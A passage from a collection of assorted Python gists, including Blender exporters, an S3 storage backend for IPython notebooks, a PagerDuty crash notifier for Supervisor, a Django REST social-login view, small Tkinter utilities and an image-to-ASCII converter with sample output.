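# Example invocation (only the 'ranged' mode is implemented above; the learning
# rate is the main knob):
#   python snippet.py ranged --n 1000 --lr 9e-3
# Ctrl-C stops the training loop and runs the _test/pdb block at the end.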
```
#### File: hard-gists/4636851/snippet.py
```python
import bpy
from bpy_extras import keyconfig_utils
import sys
# Dump Blender keyconfig as HTML.
# How to use
# 1. Open this file in Blender's Text Editor.
# 2. Do "Run Script".
# 3. New Text "keyconfigs.html" will be added.
# save it somewhere and open in web browser (recommends Safari, Chrome or Firefox).
#
# JSON format
# [keyconfig0, keyconfig1, ...]
# keyconfig := {name:"name", keymap:[keymap0, keymap1, ...]}
# keymap := {name:"name", item:[item0, item1, ...]}
# item := {name:"name", modifier_keys:["like 'Ctrl' or empty", ...], key:"key", propvalue:"value"}
html1 = """<html><head>
<script>
"""
html2 = """
function init() {
var tabul = document.getElementById('tabs');
var tablecon = document.getElementById('tables');
var contents = [];
var createTabAction = function (tabindex) {
return function () {
for(var i = 0; i < contents.length; i++) {
var tmp = contents[i];
if(i == tabindex) {
tmp.tab.className = 'selected';
tmp.table.style.display = 'block';
} else {
tmp.tab.className = '';
tmp.table.style.display = 'none';
}
}
};
};
for(var i = 0; i < bl_keyconfs.length; i++) {
var kc = bl_keyconfs[i];
// create tab
var tabelm = document.createElement('li');
tabelm.className = 'tab';
tabelm.innerHTML = kc.name;
tabul.appendChild(tabelm);
tabelm.addEventListener('click', createTabAction(i));
// create table
var tablegroup = document.createElement('div');
tablecon.appendChild(tablegroup);
for(var ikm = 0; ikm < kc.keymaps.length; ikm++) {
var km = kc.keymaps[ikm];
var keytatble = document.createElement('table');
tablegroup.appendChild(keytatble);
var caption = document.createElement('caption');
caption.innerHTML = km.name;
keytatble.appendChild(caption);
for(var iki = 0; iki < km.items.length; iki++) {
var ki = km.items[iki];
var tr = document.createElement('tr');
keytatble.appendChild(tr);
// action description
var td;
td = document.createElement('td');
td.style.width = '35%';
td.innerHTML = (ki.name.length > 0)? ki.name : '-';
tr.appendChild(td);
// key
td = document.createElement('td');
td.style.width = '35%';
var modkey = "";
for(var imod = 0; imod < ki.modifier_keys.length; imod++) {
modkey += ki.modifier_keys[imod] + ' + ';
}
td.innerHTML = modkey + ki.key;
tr.appendChild(td);
// misc
td = document.createElement('td');
td.innerHTML = (ki.propvalue.length > 0)? ki.propvalue : '-';
tr.appendChild(td);
}
}
contents.push({'tab':tabelm, 'table':tablegroup})
}
(createTabAction(0))();
}
window.addEventListener('load', init);
</script>
<style>
table {
margin-top: 2ex;
width: 100%;
border-collapse: collapse;
}
td {
margin: 0;
padding: 4px 8px 4px 8px;
border: 1px solid #000;
}
caption {
text-align: left;
font-size: 120%;
font-weight: bold;
}
.tablewrapper {
padding: 4px;
border: 1px solid #000;
border-top-width: 0;
position: relative;
display: block;
}
.tablegroup {
padding: 0;
margin: 0;
}
.tabul {
list-style: none;
margin: 0;
padding: 0;
position:relative;
}
.tabul:after {
position: absolute;
content: "";
width: 100%;
bottom: 0;
left: 0;
border-bottom: 1px solid #000;
z-index: 1;
}
.tabul li {
background: #ccc;
color: #000;
position: relative;
margin: 0 1px 0 0;
padding: 4px 10px;
border: 1px solid #000;
display: inline-block;
z-index: 0;
}
.tabul li.selected {
background: #fff;
color: #000;
border-bottom-color: #fff;
z-index: 2;
}
</style>
</head>
<body>
<h1>Blender Key Configs</h1>
<div id="conf">
<ul class="tabul" id="tabs"></ul>
<div class="tablewrapper" id="tables"></div>
</div>
</body>
</html>
"""
def create_keymapitem_json(ki):
modkeys = []
if ki.any:
modkeys.append('Any')
else:
if ki.ctrl:
modkeys.append('Ctrl')
if ki.alt:
modkeys.append('Alt')
if ki.shift:
modkeys.append('Shift')
if ki.oskey:
#modkeys.append('OSkey')
modkeys.append('Cmd')
if ki.key_modifier != 'NONE':
modkeys.append(ki.key_modifier)
json = '{{"name":"{}",'.format(ki.name)
if len(modkeys) > 0:
json += '"modifier_keys":["{}"]'.format('","'.join(modkeys))
else:
json += '"modifier_keys":[]'
json += ',"key":"{}"'.format(ki.type)
if ki.propvalue != 'NONE':
json += ',"propvalue":"{}"'.format(ki.propvalue)
else:
json += ',"propvalue":""'
json += '}'
return json
def create_keymap_json(kc):
json = '{{"name":"{}","items":['.format(kc.name)
for i, ki in enumerate(kc.keymap_items):
if i > 0: json += ','
json += create_keymapitem_json(ki)
json += '\n'
json += ']}'
return json
def create_keyconfig_json(kc):
json = '{{"name":"{}","keymaps":['.format(kc.name)
for i, km in enumerate(kc.keymaps):
if i > 0: json += ','
json += create_keymap_json(km)
json += '\n'
json += ']}'
return json
wm = bpy.context.window_manager
#kc = wm.keyconfigs.default
#kc = wm.keyconfigs.addon
#kc = wm.keyconfigs.user
#kc = wm.keyconfigs.active
#keyconfig_utils.keyconfig_export(wm, kc, "./keys.txt")
keyconfs = []
for kc in wm.keyconfigs:
keyconfs.append(create_keyconfig_json(kc))
kcjson = 'var bl_keyconfs=[' + ','.join(keyconfs) + '];'
#print(kcjson)
#f = open('./keys.js', 'w')
#f.write(kcjson)
#f.close()
#print("write to file. done");
exist_texts = set(i.name for i in bpy.data.texts)
bpy.ops.text.new()
cur_texts = set(i.name for i in bpy.data.texts)
added_texts = cur_texts - exist_texts
newtext = bpy.data.texts[added_texts.pop()]
newtext.name = 'keyconfigs.html'
newtext.from_string(html1 + kcjson + html2)
```
#### File: hard-gists/4654376/snippet.py
```python
class ClassPathHacker :
##########################################################
# from http://forum.java.sun.com/thread.jspa?threadID=300557
#
# Author: <NAME> 2007 translated the above Java to this
# Jython class
# Modified by: <NAME> <EMAIL>
# Purpose: Allow runtime additions of new Class/jars either from
# local files or URL
######################################################
import java.lang.reflect.Method
import java.io.File
import java.net.URL
import java.net.URLClassLoader
import jarray
import java
def addFile (self, s):
#############################################
# Purpose: If adding a file/jar call this first
# with s = path_to_jar
#############################################
# make a URL out of 's'
f = self.java.io.File (s)
u = f.toURL ()
a = self.addURL (u)
return a
def addURL (self, u):
##################################
# Purpose: Call this with u= URL for
# the new Class/jar to be loaded
#################################
sysloader = self.java.lang.ClassLoader.getSystemClassLoader()
sysclass = self.java.net.URLClassLoader
method = sysclass.getDeclaredMethod("addURL", [self.java.net.URL]) #parameters.toArray())
a = method.setAccessible(1)
jar_a = self.jarray.array([u], self.java.lang.Object)
b = method.invoke(sysloader, [u])
return u
if __name__=="__main__":
from java.lang import *
jarloader=ClassPathHacker()
jarloader.addFile(r'./mysql-connector-java-5.1.21.jar')
Class.forName("com.mysql.jdbc.Driver")
import sys
#sys.path+=[r'./mysql-connector-java-5.1.21.jar'] # unnecessary
import com.mysql.jdbc.Driver
```
#### File: hard-gists/4760272/snippet.py
```python
import datetime
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from tornado import web
from .nbmanager import NotebookManager
from IPython.nbformat import current
from IPython.utils.traitlets import Unicode, Instance
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class S3NotebookManager(NotebookManager):
aws_access_key_id = Unicode('', config=True, help='AWS access key.')
aws_secret_access_key = Unicode('', config=True, help='AWS S3 storage account key.')
bucket = Unicode('', config=True, help='Bucket name for notebooks.')
meta_nbname = "nbname"
def __init__(self, **kwargs):
super(S3NotebookManager, self).__init__(**kwargs)
self.__s3_conn = None
self.log_info()
# Form unique bucket using access key + bucket name
# Wanted to add access_key to this but lower() isn't working
self.__bucket_name = self.bucket
self.__create_container()
@property
def s3_conn(self):
"""Lazy initialize"""
if not self.__s3_conn:
self.__s3_conn = S3Connection(aws_access_key_id = self.aws_access_key_id,
aws_secret_access_key = self.aws_secret_access_key)
return self.__s3_conn
def __create_container(self):
if not self.s3_conn.lookup(self.__bucket_name):
self.s3_conn.create_bucket(self.__bucket_name)
def load_notebook_names(self):
"""On startup load the notebook ids and names from S3
"""
self.mapping = {}
bucket = self.s3_conn.get_bucket(self.__bucket_name)
for item in bucket:
id_ = item.name
# bug in boto doesn't load metadata
# Force metadata load with get_key
item = bucket.get_key(id_)
name = item.get_metadata(self.meta_nbname)
if name:
self.mapping[id_] = name
else:
self.log.info(name)
self.log.info(item.metadata)
self.log.info("Skipping over S3 file with no ipython name: %s" % (id_,))
def list_notebooks(self):
"""List all notebooks in the container.
This version uses `self.mapping` as the authoritative notebook list.
"""
try:
data = [dict(notebook_id=item[0],name=item[1]) for item in self.mapping.items()]
data = sorted(data, key=lambda item: item['name'])
except Exception as e:
self.log.info("Problem sorting, this is the mapping: %s" % (self.mapping.items()))
raise
return data
def read_notebook_object(self, notebook_id):
"""Get the object representation of a notebook by notebook_id."""
if not self.notebook_exists(notebook_id):
raise web.HTTPError(404, u'Notebook does not exist: %s' % notebook_id)
try:
# v1 and v2 and json in the .ipynb files.
bucket = self.s3_conn.get_bucket(self.__bucket_name)
k = Key(bucket)
k.key = notebook_id
data = k.get_contents_as_string()
#self.log.info("downloaded contents: %s" % (data,))
except:
raise web.HTTPError(500, u'Couldn\'t pull out of s3.')
try:
nb = current.reads(data, u'json')
except:
raise web.HTTPError(500, u'Unreadable JSON notebook.')
# Todo: The last modified should actually be saved in the notebook document.
# We are just using the current datetime until that is implemented.
last_modified = datetime.datetime.utcnow()
return last_modified, nb
def write_notebook_object(self, nb, notebook_id=None):
"""Save an existing notebook object by notebook_id."""
try:
new_name = nb.metadata.name
except AttributeError:
raise web.HTTPError(400, u'Missing notebook name')
if notebook_id is None:
notebook_id = self.new_notebook_id(new_name)
if notebook_id not in self.mapping:
raise web.HTTPError(404, u'Notebook does not exist: %s' % notebook_id)
try:
data = current.writes(nb, u'json')
except Exception as e:
raise web.HTTPError(400, u'Unexpected error while saving notebook: %s' % e)
try:
bucket = self.s3_conn.get_bucket(self.__bucket_name)
key = Key(bucket)
key.key = notebook_id
key.set_metadata(self.meta_nbname, new_name)
#self.log.info("Setting contents to: %s" % (data,))
key.set_contents_from_string(data)
except Exception as e:
raise web.HTTPError(400, u'Unexpected error while saving notebook: %s' % e)
self.mapping[notebook_id] = new_name
return notebook_id
def delete_notebook(self, notebook_id):
"""Delete notebook by notebook_id."""
if not self.notebook_exists(notebook_id):
raise web.HTTPError(404, u'Notebook does not exist: %s' % notebook_id)
try:
bucket = self.s3_conn.get_bucket(self.__bucket_name)
k = Key(bucket)
k.key = notebook_id
k.delete()
except Exception as e:
raise web.HTTPError(400, u'Unexpected error while deleting notebook: %s' % e)
else:
self.delete_notebook_id(notebook_id)
def log_info(self):
self.log.info("Serving notebooks from S3 storage: %s, %s", self.aws_access_key_id, self.bucket)
```
#### File: hard-gists/4776b4b2075bf9b7e512/snippet.py
```python
from Foundation import NSKeyedUnarchiver
from struct import unpack
# This entire function is black magic of the highest order and I'll blog about it later
def extract_share(bookmark_data):
content_offset, = unpack('I', bookmark_data[12:16])
first_TOC, = unpack('I', bookmark_data[content_offset:content_offset+4])
first_TOC += content_offset
TOC_len, rec_type, level, next_TOC, record_count = unpack('IIIII', bookmark_data[first_TOC:first_TOC+20])
TOC_cursor = first_TOC + 20
record_offsets = {}
for i in range(record_count):
record_id, offset = unpack('<IQ', bookmark_data[TOC_cursor:TOC_cursor+12])
record_offsets[record_id] = offset + content_offset
TOC_cursor += 12
mount_record = record_offsets.get(0x2050, None)
# Check to see if we actually had a volMountURL record
if mount_record is not None:
mount_length, rec_type = unpack('II', bookmark_data[mount_record:mount_record+8])
mount_record += 8
mount_URL = (bookmark_data[mount_record:mount_record+mount_length]).decode('utf-8')
return mount_URL
else:
return None
def get_recentservers(sfl_file_path):
# Read the com.apple.LSSharedFileList.RecentServers.sfl file (located in ~/Library/Application Support/com.apple.sharedfilelist on 10.11+)
with open(sfl_file_path, 'rb') as f:
raw_data = f.read()
# It's NSKeyedArchiver data - let's decode it!
recent_servers = NSKeyedUnarchiver.unarchiveObjectWithData_(buffer(raw_data))
# Build an empty set
server_URLs = []
# Add in our discovered server URLs from the SFLListItems and return in 'SFLListItem.order' order
for x in sorted(recent_servers['items'], lambda y,_: int(y.order())):
url = extract_share(x.bookmark()[:].tobytes())
if url is not None:
server_URLs.append(url)
return server_URLs
# Example usage:
# get_recentservers('com.apple.LSSharedFileList.RecentServers.sfl')
```
#### File: hard-gists/478f9ba38afb1bf5f5613bfe46eb82ce/snippet.py
```python
from random import choice
from string import ascii_lowercase, ascii_uppercase, digits
from tkinter import Tk, Entry, Button, StringVar
def random_string(length):
return ''.join(choice(ascii_lowercase + digits + ascii_uppercase) for i in range(length))
root = Tk()
root.title('32 chars random string generator')
var = StringVar()
var.set(random_string(32))
entry = Entry(root, width=40, justify='center', textvariable=var)
entry.pack(padx=5, pady=5)
def copy_callback():
root.clipboard_clear()
root.clipboard_append(var.get())
def gen_callback():
var.set(random_string(32))
button_generate = Button(root, text="Generate", command=gen_callback)
button_generate.pack(padx=5, pady=5)
button_copy = Button(root, text="Copy to clipboard", command=copy_callback)
button_copy.pack(padx=5, pady=5)
root.mainloop()
```
#### File: hard-gists/4961824/snippet.py
```python
import tkinter
from time import strftime
#by <NAME>
clock = tkinter.Label()
clock.pack()
clock['font'] = 'Helvetica 120 bold'
clock['text'] = strftime('%H:%M:%S')
def tictac():
agora = strftime('%H:%M:%S')
if agora != clock['text']:
clock['text'] = agora
clock.after(100, tictac)
tictac()
clock.mainloop()
```
#### File: hard-gists/4995164/snippet.py
```python
from django.core.exceptions import ImproperlyConfigured
from django.core.management import call_command
from django.db.models.signals import post_syncdb
from south.models import MigrationHistory
import pizzanuvola_teaser.settings as settings
def migration_exists(appname, migrationnumber):
appname = appname.split('.')[-1]
return MigrationHistory.objects.filter(app_name=appname, migration__icontains=migrationnumber).exists()
def load_data(app, sender, **kwargs):
if app.__name__ == settings.INSTALLED_APPS[-1] + ".models":
migrations = {
'allauth.socialaccount': [
'0001',
'0002',
'0003',
'0004',
'0005',
'0006',
'0007',
'0008',
],
'allauth.socialaccount.providers.facebook': [
'0001',
'0002',
],
}
for appname, migrationlist in migrations.iteritems():
for migration in migrationlist:
if not migration_exists(appname, migration):
try:
call_command('migrate', appname, migration)
except ImproperlyConfigured:
pass
post_syncdb.connect(load_data)
```
#### File: hard-gists/4996449/snippet.py
```python
import urllib2
import json
from supervisor import childutils
import sys
import socket
class PagerDutyNotifier(object):
def __init__(self, pd_service_key):
self.pd_service_key = pd_service_key
def run(self):
while True:
headers, payload = childutils.listener.wait()
sys.stderr.write(str(headers) + '\n')
payload = dict(v.split(':') for v in payload.split(' '))
sys.stderr.write(str(payload) + '\n')
if headers['eventname'] == 'PROCESS_STATE_EXITED' and not int(payload['expected']):
data = {'service_key': self.pd_service_key,
'event_type': 'trigger',
'description': '{} service has crashed unexpectedly on {}'.format(payload['processname'], socket.gethostname())
}
try:
res = urllib2.urlopen('https://events.pagerduty.com/generic/2010-04-15/create_event.json', json.dumps(data))
except urllib2.HTTPError, ex:
sys.stderr.write('{} - {}\n{}'.format(ex.code, ex.reason, ex.read()))
else:
sys.stderr.write('{}, {}\n'.format(res.code, res.msg))
childutils.listener.ok()
sys.stderr.flush()
if __name__ == '__main__':
pager_duty_service_key = sys.argv[1]
pager_duty_notifer = PagerDutyNotifier(pager_duty_service_key)
pager_duty_notifer.run()
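# Supervisord wiring sketch (paths and section name are placeholders): the
# script runs as an event listener subscribed to PROCESS_STATE_EXITED, e.g.
#   [eventlistener:pagerduty]
#   command=python /path/to/this_script.py <pagerduty-service-key>
#   events=PROCESS_STATE_EXITED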
```
#### File: hard-gists/4a07818b8a21dd5c49013b9ed496cb70/snippet.py
```python
import bpy
myCurve = bpy.data.curves[0] # here your curve
spline= myCurve.splines[0] # maybe you need a loop if more than 1 spline
scale = 200
curvepath_template = """
var curves = new THREE.CurvePath();
%s
var geometry = curves.createSpacedPointsGeometry(100);
var material = new THREE.LineBasicMaterial({
color: 0xff0000
});
// Create the final Object3d to add to the scene
var curveObject = new THREE.Line(geometry, material);"""
curve_template = """\ncurves.add(new THREE.CubicBezierCurve3(%s\n));"""
vector3_template = """\n new THREE.Vector3( %f, %f, %f ),"""
def makecurve(*vectors):
vector3_string = ''
for vector in vectors:
vector3_string = vector3_string + vector3_template % (
vector[0]*scale,
vector[1]*scale,
vector[2]*scale)
return vector3_string
curves = []
for x in range(len(spline.bezier_points) - 1): # stop before the last point: each segment uses points x and x+1
curves.append(curve_template % makecurve(spline.bezier_points[x].co
,spline.bezier_points[x].handle_right
,spline.bezier_points[x+1].handle_left
,spline.bezier_points[x+1].co)[:-1])
output = curvepath_template % ''.join(curves)
print(output)
```
#### File: hard-gists/4a4e7e700c34c04160b93aa03a14861c/snippet.py
```python
from __future__ import division
import numpy as np
import scipy.optimize
def multiclass_update(A, w, j):
"""Given matrix A in R^{k x d}), w in R^d) and j, find B that solves:
min_B ||B-A||^2 st (w B)_j >= (w B)_i + 1 for all i != j
observe that any change will be in the direction of x
so compute scalars:
C_i = [ a_i - a_j + 1 ] / ||x||^2
where a_i is x*A[i,:]
"""
k, d = A.shape
a = A.dot(w)
C = (a - a[j] + 1) / w.dot(w)
C[j] = 0
delta = min_delta(C, j)
return A + delta.reshape((k,1)).dot(w.reshape(1, d))
def slow(A, w, j):
# Here's a slow version of the same problem, which uses a less-efficient
# numerical method to find the solution.
# min_B ||B-A||^2 st (w B)_j >= (w B)_i + 1 for all i != j
[k, d] = A.shape
def f(x):
B = x.reshape((k,d))
D = (B - A).flatten()
return 0.5*D.dot(D), D
def h(x):
# inequality constraints
B = x.reshape((k,d))
s = B.dot(w)
H = (s[j] - s - 1)
H[j] = 0
return H
# precompute Jacobian of constraints
J = np.zeros((k,d,k))
for i in range(k):
if i != j:
J[i,:,i] -= w
J[j,:,i] += w
J = J.reshape((k*d,k)).T
def h_jac(_):
return J
if 0:
from arsenal.math import spherical, compare
x = A.flatten()
eps = 1e-5
m = 100
fd = np.zeros(m)
ad = np.zeros(m)
for t in range(m):
y = spherical(k*d)
z = spherical(k)
fd[t] = (h(x + eps*y).dot(z) - h(x - eps*y).dot(z)) / (2*eps)
ad[t] = y.dot((h_jac(x).T.dot(z)).flatten())
compare(fd, ad).show()
return scipy.optimize.minimize(f, x0 = A, jac=1,
constraints={'type': 'ineq', 'fun': h, 'jac': h_jac}).x
def min_delta(C, j):
# solve:
# min_delta sum_i delta_i^2 st delta_j >= delta_i + C_i for i != j
# do a change of variables where
# z = delta + D
# then we want to solve
# min_x ||x-z|| st x_j >= x_i for i != j
# after reordering C so that D[0] = C[j] and D[1:] is sorted(C[!j])
# and then need to un-sort the results
order = (-C).argsort()
j_idx = (order == j).nonzero()[0][0]
order2 = np.concatenate([[j], order[:j_idx], order[j_idx+1:]])
proj = column_squishing(C[order2], False)
return proj[order2.argsort()] - C
def column_squishing(z, do_proj=True):
# input: z has z_2 >= z_3 >= z_4 >= ... >= z_n
# returns the projection of z into { x in R : 0 <= x_i <= x_1 <= 1 }
# this is algorithm 5 from:
# Factoring nonnegative matrices with linear programs
# by <NAME> al., June 2012
# http://pages.cs.wisc.edu/~brecht/papers/12.Bit.EtAl.HOTT.pdf
proj01 = (lambda a: max(0, min(1, a))) if do_proj else (lambda a: a)
proj0_ = (lambda a: max(0, a)) if do_proj else (lambda a: a)
n = z.shape[0]
assert len(z.shape) == 1
assert all([z[i] >= z[i+1] for i in xrange(1, n-1)])
mu = z[0]
kc = n-1
for k in range(1, n):
if z[k] <= proj01(mu):
kc = k - 1
break
mu = mu * k / (k+1) + z[k] / (k+1)
x = np.zeros(n) + proj01(mu)
for k in range(kc+1, n):
x[k] = proj0_(z[k])
return x
import seaborn
import pandas as pd
import pylab as pl
from arsenal.timer import timers
from arsenal import iterview
from arsenal.math import assert_equal
def main():
T = timers()
R = 10 # repetitions
ks = range(3, 120, 10) * R
np.random.shuffle(ks)
for k in iterview(ks):
i = np.random.randint(k)
d = 5
A = np.random.randn(k,d)
w = np.random.randn(d)
with T['fast'](k=k):
a = multiclass_update(A, w, i)
with T['slow'](k=k):
b = slow(A, w, i)
assert_equal(a.flatten(), b.flatten())
s = a.dot(w)
assert s.argmax() == i # `i` should win.
s = np.sort(s)
margin = s[-1] - s[-2]
assert margin >= 0.99999
T.plot_feature('k', show='scatter')
pl.show()
if __name__ == '__main__':
main()
```
#### File: hard-gists/4aed548e606f11971f5a/snippet.py
```python
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework.settings import api_settings
from social.apps.django_app.utils import strategy
from social.backends.oauth import BaseOAuth1, BaseOAuth2
from api.serializers.social_login import ObtainSocialAuthTokenSerializer
@strategy()
def _register_by_access_token(request, backend):
"""
Checks what OAuth protocol is being used for social authentication, backend corresponds to the allowed backend types
and authenticates the user using the access token from the request.
"""
backend = request.strategy.backend
if isinstance(backend, BaseOAuth1):
token = {
'oauth_token': request.POST.get('access_token'),
'oauth_token_secret': '<secret>' # required by python-social-auth, but is not used
}
elif isinstance(backend, BaseOAuth2):
token = request.POST.get('access_token')
else:
raise Response("Wrong backend type", status=status.HTTP_400_BAD_REQUEST)
return backend.do_auth(token)
class ObtainSocialAuthTokenView(ObtainAuthToken):
serializer_class = ObtainSocialAuthTokenSerializer
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
parser_classes = api_settings.DEFAULT_PARSER_CLASSES
class Meta():
list_wrapper = "tokens"
instance_wrapper = "token"
def post(self, request, backend):
serializer = self.serializer_class(data=request.DATA)
if serializer.is_valid():
user = _register_by_access_token(request, backend)
if user:
user_url = reverse('user-instance', args=[user.pk], request=request)
token, created = Token.objects.get_or_create(user=user)
return Response({'token': token.key, 'user_id': user.id, 'user_url': user_url})
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
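# Hypothetical URLconf wiring (not part of the original gist): the keyword
# argument must be named `backend` so it reaches post() above, e.g.
#   url(r'^auth/social/(?P<backend>[^/]+)/$', ObtainSocialAuthTokenView.as_view()),
# and the client POSTs the provider-issued `access_token` to that endpoint.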
```
#### File: hard-gists/4b5afb297b4b7c835e6f/snippet.py
```python
from PIL import Image, ImageDraw
import sys
def pix_in_char(c):
size = (10,10)
im = Image.new('RGB', size)
draw = ImageDraw.Draw(im)
white = (255,255,255)
text_pos = (0,0)
draw.text(text_pos, c+c, fill=white)
del draw
pix = im.load()
cid = 0
for x in range(10):
for y in range(10):
cid = cid if pix[x,y][0]==0 else cid + y
return cid
pix_in_char_table = {}
for i in range(255):
character = chr(i)
pix_count = pix_in_char(character)
pix_in_char_table[pix_count] = character
pix_in_char_table[pix_count] = " "
keys = sorted(list(pix_in_char_table.keys()))
base = int(255/len(pix_in_char_table))
if len(sys.argv)!=2:
print("Need image name only.")
exit()
image_name = sys.argv[1]
output_name = image_name.split(".")[0] + "__image_2_ascii__.txt"
im = Image.open(image_name)
pix = im.load()
image_text = ""
for y in range(im.size[1]):
for x in range(im.size[0]):
clr = int(sum(pix[x,y])/4)
image_text += pix_in_char_table[keys[int(clr/base)]]*2
image_text += "\n"
open(output_name, "w").write(image_text)
"""
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnnnqqllffffffllqqqqqqyynnnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyffZZppppppQQppllqqllllllllqqyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnllppQQQQQQppppQQppllqqllllllllllllqqnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZppQQppppppppppQQppllllllllllllllllllqqyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppppppppppppppQQppllqqllllllllllllllllllyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppppppppppppppppQQppllqqllllllllllllllllllllyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnZZQQppppppppppppppppppQQppllqqllllllllllllllllllllqqnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnffQQppppppppppppppppppppQQppllqqllllllllllllllllllllllqqnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnllppQQppppppppppppppppppppQQppllqqllllllllllllllllllllllqqyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppppppppppppppppppppppQQppllqqllllllllllllllllllllllllqqnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnffQQppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllyyxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnqqppQQppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllnnxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnZZQQppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllqqssnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyynnllppQQppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllllyyssnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyynnnnZZQQppppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllllqqxxxxnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyynnllppppppppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllllllyyssnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyynnnnZZQQppppppppppppppppppppppppppppppppppllqqllllllllllllllllllllllllllllllllqqxxxxnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyynnllppppppppppppppppppppppppppQQQQQQQQQQQQffffffllllllllllllllllllllllllllllllllyyssxxxxnnyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyynnZZQQppppppppppppppppppQQQQQQddddddddddddZZZZZZffffffffllllllllllllllllllllllllqqxxxxnnnnnnyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyynnllppQQppppppppppppQQQQQQddddddddddddddddddZZZZZZZZffffffffffffllllllllllllllllllllnnssxxnnnnnnyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyynnZZQQppppppppppppQQddddddddddddddddddddddddZZZZZZZZZZffffffffffffffllllllllllllllllqqssxxxxnnnnnnyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyynnllppQQppppppQQQQQQddddddddddddddddddddddddddZZZZZZZZZZZZffffffffffffffffllllllllllllllnnssxxnnnnnnnnyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyynnZZQQppppppQQppppddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZffffffffffffffllllllllllllyyssxxxxnnnnnnnnyyyyyyyyyyyyyyyyyy
